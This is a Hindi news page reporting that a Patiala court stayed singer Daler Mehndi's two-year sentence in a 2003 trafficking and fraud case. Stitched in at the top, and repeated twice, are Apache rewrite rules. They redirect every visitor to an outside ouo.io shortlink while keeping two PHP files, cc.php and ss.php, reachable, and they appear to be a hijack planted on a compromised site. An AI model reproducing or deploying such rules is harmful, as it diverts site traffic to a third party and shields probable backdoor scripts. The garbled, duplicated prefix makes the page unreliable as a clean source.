
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 312
Previous Nextनई दिल्ली। पंजाबी पॉप सिंगर दलेर मेहंदी को सुनाई गई सजा पर कोर्ट ने रोक लगा दी है। उन्हें 2003 के मानव तस्करी के एक मामले में कोर्ट ने दो साल की सजा सुनाई थी। मेहंदी के वकील ने सजा के खिलाफ कोर्ट में अपील की थी, जिसपर सुनवाई करते हुए पटियाला की एडिशनल डिस्ट्रिक और सेशन जज की अदालत ने रोक लगा दी। बता दें कि 16 मार्च को ज्यूडिशियल मजिस्ट्रेट निधि सैनी की कोर्ट ने गायक मेहंदी को मानव तस्करी के मामले में दोषी पाया था। कोर्ट ने उन्हें दो साल की सजा सुनाई थी। हालांकि, कुछ ही मिनटों में उन्हें जमानत मिल गई।
पुलिस ने दलेर, उनके भाई शमशेर सिंह (जिनकी पिछले साल अक्टूबर में मौत हो गई) और दो अन्य के खिलाफ विदेश भेजने के बहाने लोगों से एक करोड़ रुपये ठगने का मामला दर्ज किया था। शिकायतकर्ता बख्शीश सिंह ने आरोप लगाया था कि न तो डील पूरी की गई और न ही आरोपियों ने उनका पैसा वापस किया। पटियाला में साल 2003 में यह मामला दर्ज किया गया था. इस मामले में दलेर को गिरफ्तार किया गया था। कुछ दिनों बाद उन्हें जमानत पर रिहा कर दिया गया था। दलेर ने कहा कि वह निर्दोष हैं, उन्हें जमानत मिल गई है और वह पटियाला की अदालत के फैसले के खिलाफ ऊपरी अदालत में जाएंगे।